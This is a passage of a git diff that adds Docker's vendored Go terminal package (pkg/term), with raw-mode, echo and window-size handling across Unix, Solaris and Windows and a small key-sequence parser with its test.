+
+import (
+	"io"
+)
+
+type writeCloseFlusher interface {
+	io.WriteCloser
+	Flush() error
+}
+
+type nopCloseFlusher struct {
+	io.Writer
+}
+
+func (n *nopCloseFlusher) Close() error {
+	return nil
+}
+
+func (n *nopCloseFlusher) Flush() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go
new file mode 100644
index 0000000000..f5262bccf5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/ascii.go
@@ -0,0 +1,66 @@
+package term
+
+import (
+	"fmt"
+	"strings"
+)
+
+// ASCII list the possible supported ASCII key sequence
+var ASCII = []string{
+	"ctrl-@",
+	"ctrl-a",
+	"ctrl-b",
+	"ctrl-c",
+	"ctrl-d",
+	"ctrl-e",
+	"ctrl-f",
+	"ctrl-g",
+	"ctrl-h",
+	"ctrl-i",
+	"ctrl-j",
+	"ctrl-k",
+	"ctrl-l",
+	"ctrl-m",
+	"ctrl-n",
+	"ctrl-o",
+	"ctrl-p",
+	"ctrl-q",
+	"ctrl-r",
+	"ctrl-s",
+	"ctrl-t",
+	"ctrl-u",
+	"ctrl-v",
+	"ctrl-w",
+	"ctrl-x",
+	"ctrl-y",
+	"ctrl-z",
+	"ctrl-[",
+	"ctrl-\\",
+	"ctrl-]",
+	"ctrl-^",
+	"ctrl-_",
+}
+
+// ToBytes converts a string representing a suite of key-sequence to the corresponding ASCII code.
+func ToBytes(keys string) ([]byte, error) {
+	codes := []byte{}
+next:
+	for _, key := range strings.Split(keys, ",") {
+		if len(key) != 1 {
+			for code, ctrl := range ASCII {
+				if ctrl == key {
+					codes = append(codes, byte(code))
+					continue next
+				}
+			}
+			if key == "DEL" {
+				codes = append(codes, 127)
+			} else {
+				return nil, fmt.Errorf("Unknown character: '%s'", key)
+			}
+		} else {
+			codes = append(codes, byte(key[0]))
+		}
+	}
+	return codes, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go
new file mode 100644
index 0000000000..4a1e7f302c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go
@@ -0,0 +1,43 @@
+package term
+
+import "testing"
+
+func TestToBytes(t *testing.T) {
+	codes, err := ToBytes("ctrl-a,a")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(codes) != 2 {
+		t.Fatalf("Expected 2 codes, got %d", len(codes))
+	}
+	if codes[0] != 1 || codes[1] != 97 {
+		t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1])
+	}
+
+	codes, err = ToBytes("shift-z")
+	if err == nil {
+		t.Fatalf("Expected error, got none")
+	}
+
+	codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(codes) != 4 {
+		t.Fatalf("Expected 4 codes, got %d", len(codes))
+	}
+	if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 {
+		t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3])
+	}
+
+	codes, err = ToBytes("DEL,+")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(codes) != 2 {
+		t.Fatalf("Expected 2 codes, got %d", len(codes))
+	}
+	if codes[0] != 127 || codes[1] != 43 {
+		t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1])
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
new file mode 100644
index 0000000000..59dac5ba8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
@@ -0,0 +1,50 @@
+// +build linux,cgo
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// #include <termios.h>
+import "C"
+
+// Termios is the Unix API for terminal I/O.
+// It is passthrough for syscall.Termios in order to make it portable with
+// other platforms where it is not available or handled differently.
+type Termios syscall.Termios
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if err := tcget(fd, &oldState.termios); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+
+	C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState)))
+	if err := tcset(fd, &newState); err != 0 {
+		return nil, err
+	}
+	return &oldState, nil
+}
+
+func tcget(fd uintptr, p *Termios) syscall.Errno {
+	ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p)))
+	if ret != 0 {
+		return err.(syscall.Errno)
+	}
+	return 0
+}
+
+func tcset(fd uintptr, p *Termios) syscall.Errno {
+	ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p)))
+	if ret != 0 {
+		return err.(syscall.Errno)
+	}
+	return 0
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go
new file mode 100644
index 0000000000..750d7c3f60
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/tc_other.go
@@ -0,0 +1,20 @@
+// +build !windows
+// +build !linux !cgo
+// +build !solaris !cgo
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+func tcget(fd uintptr, p *Termios) syscall.Errno {
+	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p)))
+	return err
+}
+
+func tcset(fd uintptr, p *Termios) syscall.Errno {
+	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p)))
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
new file mode 100644
index 0000000000..c9139d0ca8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
@@ -0,0 +1,63 @@
+// +build solaris,cgo
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// #include <termios.h>
+import "C"
+
+// Termios is the Unix API for terminal I/O.
+// It is passthrough for syscall.Termios in order to make it portable with
+// other platforms where it is not available or handled differently.
+type Termios syscall.Termios
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if err := tcget(fd, &oldState.termios); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+
+	newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY)
+	newState.Oflag &^= syscall.OPOST
+	newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN)
+	newState.Cflag &^= (syscall.CSIZE | syscall.PARENB)
+	newState.Cflag |= syscall.CS8
+
+	/*
+		VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned
+		Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It
+		needs to be explicitly set to 1.
+	*/
+	newState.Cc[C.VMIN] = 1
+	newState.Cc[C.VTIME] = 0
+
+	if err := tcset(fd, &newState); err != 0 {
+		return nil, err
+	}
+	return &oldState, nil
+}
+
+func tcget(fd uintptr, p *Termios) syscall.Errno {
+	ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p)))
+	if ret != 0 {
+		return err.(syscall.Errno)
+	}
+	return 0
+}
+
+func tcset(fd uintptr, p *Termios) syscall.Errno {
+	ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p)))
+	if ret != 0 {
+		return err.(syscall.Errno)
+	}
+	return 0
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go
new file mode 100644
index 0000000000..fe59faa949
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/term.go
@@ -0,0 +1,123 @@
+// +build !windows
+
+// Package term provides structures and helper functions to work with
+// terminal (state, sizes).
+package term
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"os/signal"
+	"syscall"
+)
+
+var (
+	// ErrInvalidState is returned if the state of the terminal is invalid.
+	ErrInvalidState = errors.New("Invalid terminal state")
+)
+
+// State represents the state of the terminal.
+type State struct {
+	termios Termios
+}
+
+// Winsize represents the size of the terminal window.
+type Winsize struct {
+	Height uint16
+	Width  uint16
+	x      uint16
+	y      uint16
+}
+
+// StdStreams returns the standard streams (stdin, stdout, stedrr).
+func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
+	return os.Stdin, os.Stdout, os.Stderr
+}
+
+// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal.
+func GetFdInfo(in interface{}) (uintptr, bool) {
+	var inFd uintptr
+	var isTerminalIn bool
+	if file, ok := in.(*os.File); ok {
+		inFd = file.Fd()
+		isTerminalIn = IsTerminal(inFd)
+	}
+	return inFd, isTerminalIn
+}
+
+// IsTerminal returns true if the given file descriptor is a terminal.
+func IsTerminal(fd uintptr) bool {
+	var termios Termios
+	return tcget(fd, &termios) == 0
+}
+
+// RestoreTerminal restores the terminal connected to the given file descriptor
+// to a previous state.
+func RestoreTerminal(fd uintptr, state *State) error {
+	if state == nil {
+		return ErrInvalidState
+	}
+	if err := tcset(fd, &state.termios); err != 0 {
+		return err
+	}
+	return nil
+}
+
+// SaveState saves the state of the terminal connected to the given file descriptor.
+func SaveState(fd uintptr) (*State, error) {
+	var oldState State
+	if err := tcget(fd, &oldState.termios); err != 0 {
+		return nil, err
+	}
+
+	return &oldState, nil
+}
+
+// DisableEcho applies the specified state to the terminal connected to the file
+// descriptor, with echo disabled.
+func DisableEcho(fd uintptr, state *State) error {
+	newState := state.termios
+	newState.Lflag &^= syscall.ECHO
+
+	if err := tcset(fd, &newState); err != 0 {
+		return err
+	}
+	handleInterrupt(fd, state)
+	return nil
+}
+
+// SetRawTerminal puts the terminal connected to the given file descriptor into
+// raw mode and returns the previous state. On UNIX, this puts both the input
+// and output into raw mode. On Windows, it only puts the input into raw mode.
+func SetRawTerminal(fd uintptr) (*State, error) {
+	oldState, err := MakeRaw(fd)
+	if err != nil {
+		return nil, err
+	}
+	handleInterrupt(fd, oldState)
+	return oldState, err
+}
+
+// SetRawTerminalOutput puts the output of terminal connected to the given file
+// descriptor into raw mode. On UNIX, this does nothing and returns nil for the
+// state. On Windows, it disables LF -> CRLF translation.
+func SetRawTerminalOutput(fd uintptr) (*State, error) {
+	return nil, nil
+}
+
+func handleInterrupt(fd uintptr, state *State) {
+	sigchan := make(chan os.Signal, 1)
+	signal.Notify(sigchan, os.Interrupt)
+	go func() {
+		for range sigchan {
+			// quit cleanly and the new terminal item is on a new line
+			fmt.Println()
+			signal.Stop(sigchan)
+			close(sigchan)
+			RestoreTerminal(fd, state)
+			os.Exit(1)
+		}
+	}()
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go
new file mode 100644
index 0000000000..112debbec5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/term_solaris.go
@@ -0,0 +1,41 @@
+// +build solaris
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+/*
+#include <unistd.h>
+#include <stropts.h>
+#include <termios.h>
+
+// Small wrapper to get rid of variadic args of ioctl()
+int my_ioctl(int fd, int cmd, struct winsize *ws) {
+	return ioctl(fd, cmd, ws);
+}
+*/
+import "C"
+
+// GetWinsize returns the window size based on the specified file descriptor.
+func GetWinsize(fd uintptr) (*Winsize, error) {
+	ws := &Winsize{}
+	ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws)))
+	// Skip retval = 0
+	if ret == 0 {
+		return ws, nil
+	}
+	return ws, err
+}
+
+// SetWinsize tries to set the specified window size for the specified file descriptor.
+func SetWinsize(fd uintptr, ws *Winsize) error {
+	ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws)))
+	// Skip retval = 0
+	if ret == 0 {
+		return nil
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go
new file mode 100644
index 0000000000..ddf87a0e58
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/term_unix.go
@@ -0,0 +1,29 @@
+// +build !solaris,!windows
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+// GetWinsize returns the window size based on the specified file descriptor.
+func GetWinsize(fd uintptr) (*Winsize, error) {
+	ws := &Winsize{}
+	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws)))
+	// Skipp errno = 0
+	if err == 0 {
+		return ws, nil
+	}
+	return ws, err
+}
+
+// SetWinsize tries to set the specified window size for the specified file descriptor.
+func SetWinsize(fd uintptr, ws *Winsize) error {
+	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws)))
+	// Skipp errno = 0
+	if err == 0 {
+		return nil
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go
new file mode 100644
index 0000000000..a91f07e482
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go
@@ -0,0 +1,233 @@
+// +build windows
+
+package term
+
+import (
+	"io"
+	"os"
+	"os/signal"
+	"syscall"
+
+	"github.com/Azure/go-ansiterm/winterm"
+	"github.com/docker/docker/pkg/term/windows"
+)
+
+// State holds the console mode for the terminal.
+type State struct {
+	mode uint32
+}
+
+// Winsize is used for window size.
+type Winsize struct {
+	Height uint16
+	Width  uint16
+}
+
+const (
+	// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx
+	enableVirtualTerminalInput      = 0x0200
+	enableVirtualTerminalProcessing = 0x0004
+	disableNewlineAutoReturn        = 0x0008
+)
+
+// vtInputSupported is true if enableVirtualTerminalInput is supported by the console
+var vtInputSupported bool
+
+// StdStreams returns the standard streams (stdin, stdout, stedrr).
+func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
+	// Turn on VT handling on all std handles, if possible. This might
+	// fail, in which case we will fall back to terminal emulation.
+	var emulateStdin, emulateStdout, emulateStderr bool
+	fd := os.Stdin.Fd()
+	if mode, err := winterm.GetConsoleMode(fd); err == nil {
+		// Validate that enableVirtualTerminalInput is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil {
+			emulateStdin = true
+		} else {
+			vtInputSupported = true
+		}
+		// Unconditionally set the console mode back even on failure because SetConsoleMode
+		// remembers invalid bits on input handles.
+		winterm.SetConsoleMode(fd, mode)
+	}
+
+	fd = os.Stdout.Fd()
+	if mode, err := winterm.GetConsoleMode(fd); err == nil {
+		// Validate disableNewlineAutoReturn is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil {
+			emulateStdout = true
+		} else {
+			winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing)
+		}
+	}
+
+	fd = os.Stderr.Fd()
+	if mode, err := winterm.GetConsoleMode(fd); err == nil {
+		// Validate disableNewlineAutoReturn is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil {
+			emulateStderr = true
+		} else {
+			winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing)
+		}
+	}
+
+	if os.Getenv("ConEmuANSI") == "ON" || os.Getenv("ConsoleZVersion") != "" {
+		// The ConEmu and ConsoleZ terminals emulate ANSI on output streams well.
+		emulateStdin = true
+		emulateStdout = false
+		emulateStderr = false
+	}
+
+	if emulateStdin {
+		stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE)
+	} else {
+		stdIn = os.Stdin
+	}
+
+	if emulateStdout {
+		stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE)
+	} else {
+		stdOut = os.Stdout
+	}
+
+	if emulateStderr {
+		stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE)
+	} else {
+		stdErr = os.Stderr
+	}
+
+	return
+}
+
+// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal.
+func GetFdInfo(in interface{}) (uintptr, bool) {
+	return windows.GetHandleInfo(in)
+}
+
+// GetWinsize returns the window size based on the specified file descriptor.
+func GetWinsize(fd uintptr) (*Winsize, error) {
+	info, err := winterm.GetConsoleScreenBufferInfo(fd)
+	if err != nil {
+		return nil, err
+	}
+
+	winsize := &Winsize{
+		Width:  uint16(info.Window.Right - info.Window.Left + 1),
+		Height: uint16(info.Window.Bottom - info.Window.Top + 1),
+	}
+
+	return winsize, nil
+}
+
+// IsTerminal returns true if the given file descriptor is a terminal.
+func IsTerminal(fd uintptr) bool {
+	return windows.IsConsole(fd)
+}
+
+// RestoreTerminal restores the terminal connected to the given file descriptor
+// to a previous state.
+func RestoreTerminal(fd uintptr, state *State) error {
+	return winterm.SetConsoleMode(fd, state.mode)
+}
+
+// SaveState saves the state of the terminal connected to the given file descriptor.
+func SaveState(fd uintptr) (*State, error) {
+	mode, e := winterm.GetConsoleMode(fd)
+	if e != nil {
+		return nil, e
+	}
+
+	return &State{mode: mode}, nil
+}
+
+// DisableEcho disables echo for the terminal connected to the given file descriptor.
+// -- See https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx
+func DisableEcho(fd uintptr, state *State) error {
+	mode := state.mode
+	mode &^= winterm.ENABLE_ECHO_INPUT
+	mode |= winterm.ENABLE_PROCESSED_INPUT | winterm.ENABLE_LINE_INPUT
+	err := winterm.SetConsoleMode(fd, mode)
+	if err != nil {
+		return err
+	}
+
+	// Register an interrupt handler to catch and restore prior state
+	restoreAtInterrupt(fd, state)
+	return nil
+}
+
+// SetRawTerminal puts the terminal connected to the given file descriptor into
+// raw mode and returns the previous state. On UNIX, this puts both the input
+// and output into raw mode. On Windows, it only puts the input into raw mode.
+func SetRawTerminal(fd uintptr) (*State, error) {
+	state, err := MakeRaw(fd)
+	if err != nil {
+		return nil, err
+	}
+
+	// Register an interrupt handler to catch and restore prior state
+	restoreAtInterrupt(fd, state)
+	return state, err
+}
+
+// SetRawTerminalOutput puts the output of terminal connected to the given file
+// descriptor into raw mode. On UNIX, this does nothing and returns nil for the
+// state. On Windows, it disables LF -> CRLF translation.
+func SetRawTerminalOutput(fd uintptr) (*State, error) {
+	state, err := SaveState(fd)
+	if err != nil {
+		return nil, err
+	}
+
+	// Ignore failures, since disableNewlineAutoReturn might not be supported on this
+	// version of Windows.
+	winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn)
+	return state, err
+}
+
+// MakeRaw puts the terminal (Windows Console) connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	state, err := SaveState(fd)
+	if err != nil {
+		return nil, err
+	}
+
+	mode := state.mode
+
+	// See
+	// -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686033(v=vs.85).aspx
+	// -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx
+
+	// Disable these modes
+	mode &^= winterm.ENABLE_ECHO_INPUT
+	mode &^= winterm.ENABLE_LINE_INPUT
+	mode &^= winterm.ENABLE_MOUSE_INPUT
+	mode &^= winterm.ENABLE_WINDOW_INPUT
+	mode &^= winterm.ENABLE_PROCESSED_INPUT
+
+	// Enable these modes
+	mode |= winterm.ENABLE_EXTENDED_FLAGS
+	mode |= winterm.ENABLE_INSERT_MODE
+	mode |= winterm.ENABLE_QUICK_EDIT_MODE
+	if vtInputSupported {
+		mode |= enableVirtualTerminalInput
+	}
+
+	err = winterm.SetConsoleMode(fd, mode)
+	if err != nil {
+		return nil, err
+	}
+	return state, nil
+}
+
+func restoreAtInterrupt(fd uintptr, state *State) {
+	sigchan := make(chan os.Signal, 1)
+	signal.Notify(sigchan, os.Interrupt)
+
+	go func() {
+		_ = <-sigchan
+		RestoreTerminal(fd, state)
+		os.Exit(0)
+	}()
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go
new file mode 100644
index 0000000000..480db900ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go
@@ -0,0 +1,69 @@
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+const (
+	getTermios = syscall.TIOCGETA
+	setTermios = syscall.TIOCSETA
+)
+
+// Termios magic numbers, passthrough to the ones defined in syscall.
+const (
+	IGNBRK = syscall.IGNBRK
+	PARMRK = syscall.PARMRK
+	INLCR  = syscall.INLCR
+	IGNCR  = syscall.IGNCR
+	ECHONL = syscall.ECHONL
+	CSIZE  = syscall.CSIZE
+	ICRNL  = syscall.ICRNL
+	ISTRIP = syscall.ISTRIP
+	PARENB = syscall.PARENB
+	ECHO   = syscall.ECHO
+	ICANON = syscall.ICANON
+	ISIG   = syscall.ISIG
+	IXON   = syscall.IXON
+	BRKINT = syscall.BRKINT
+	INPCK  = syscall.INPCK
+	OPOST  = syscall.OPOST
+	CS8    = syscall.CS8
+	IEXTEN = syscall.IEXTEN
+)
+
+// Termios is the Unix API for terminal I/O.
+type Termios struct {
+	Iflag  uint64
+	Oflag  uint64
+	Cflag  uint64
+	Lflag  uint64
+	Cc     [20]byte
+	Ispeed uint64
+	Ospeed uint64
+}
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
+	newState.Oflag &^= OPOST
+	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
+	newState.Cflag &^= (CSIZE | PARENB)
+	newState.Cflag |= CS8
+	newState.Cc[syscall.VMIN] = 1
+	newState.Cc[syscall.VTIME] = 0
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
+		return nil, err
+	}
+
+	return &oldState, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
new file mode 100644
index 0000000000..ed843ad69c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
@@ -0,0 +1,69 @@
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+const (
+	getTermios = syscall.TIOCGETA
+	setTermios = syscall.TIOCSETA
+)
+
+// Termios magic numbers, passthrough to the ones defined in syscall.
+const (
+	IGNBRK = syscall.IGNBRK
+	PARMRK = syscall.PARMRK
+	INLCR  = syscall.INLCR
+	IGNCR  = syscall.IGNCR
+	ECHONL = syscall.ECHONL
+	CSIZE  = syscall.CSIZE
+	ICRNL  = syscall.ICRNL
+	ISTRIP = syscall.ISTRIP
+	PARENB = syscall.PARENB
+	ECHO   = syscall.ECHO
+	ICANON = syscall.ICANON
+	ISIG   = syscall.ISIG
+	IXON   = syscall.IXON
+	BRKINT = syscall.BRKINT
+	INPCK  = syscall.INPCK
+	OPOST  = syscall.OPOST
+	CS8    = syscall.CS8
+	IEXTEN = syscall.IEXTEN
+)
+
+// Termios is the Unix API for terminal I/O.
+type Termios struct {
+	Iflag  uint32
+	Oflag  uint32
+	Cflag  uint32
+	Lflag  uint32
+	Cc     [20]byte
+	Ispeed uint32
+	Ospeed uint32
+}
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
+	newState.Oflag &^= OPOST
+	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
+	newState.Cflag &^= (CSIZE | PARENB)
+	newState.Cflag |= CS8
+	newState.Cc[syscall.VMIN] = 1
+	newState.Cc[syscall.VTIME] = 0
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
+		return nil, err
+	}
+
+	return &oldState, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go
new file mode 100644
index 0000000000..22921b6aef
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go
@@ -0,0 +1,47 @@
+// +build !cgo
+
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+const (
+	getTermios = syscall.TCGETS
+	setTermios = syscall.TCSETS
+)
+
+// Termios is the Unix API for terminal I/O.
+type Termios struct {
+	Iflag  uint32
+	Oflag  uint32
+	Cflag  uint32
+	Lflag  uint32
+	Cc     [20]byte
+	Ispeed uint32
+	Ospeed uint32
+}
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+
+	newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON)
+	newState.Oflag &^= syscall.OPOST
+	newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN)
+	newState.Cflag &^= (syscall.CSIZE | syscall.PARENB)
+	newState.Cflag |= syscall.CS8
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 {
+		return nil, err
+	}
+	return &oldState, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
new file mode 100644
index 0000000000..ed843ad69c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go
@@ -0,0 +1,69 @@
+package term
+
+import (
+	"syscall"
+	"unsafe"
+)
+
+const (
+	getTermios = syscall.TIOCGETA
+	setTermios = syscall.TIOCSETA
+)
+
+// Termios magic numbers, passthrough to the ones defined in syscall.
+const (
+	IGNBRK = syscall.IGNBRK
+	PARMRK = syscall.PARMRK
+	INLCR  = syscall.INLCR
+	IGNCR  = syscall.IGNCR
+	ECHONL = syscall.ECHONL
+	CSIZE  = syscall.CSIZE
+	ICRNL  = syscall.ICRNL
+	ISTRIP = syscall.ISTRIP
+	PARENB = syscall.PARENB
+	ECHO   = syscall.ECHO
+	ICANON = syscall.ICANON
+	ISIG   = syscall.ISIG
+	IXON   = syscall.IXON
+	BRKINT = syscall.BRKINT
+	INPCK  = syscall.INPCK
+	OPOST  = syscall.OPOST
+	CS8    = syscall.CS8
+	IEXTEN = syscall.IEXTEN
+)
+
+// Termios is the Unix API for terminal I/O.
+type Termios struct {
+	Iflag  uint32
+	Oflag  uint32
+	Cflag  uint32
+	Lflag  uint32
+	Cc     [20]byte
+	Ispeed uint32
+	Ospeed uint32
+}
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
+	newState.Oflag &^= OPOST
+	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
+	newState.Cflag &^= (CSIZE | PARENB)
+	newState.Cflag |= CS8
+	newState.Cc[syscall.VMIN] = 1
+	newState.Cc[syscall.VTIME] = 0
+
+	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
+		return nil, err
+	}
+
+	return &oldState, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go
new file mode 100644
index 0000000000..cb0b88356d
--- /dev/null
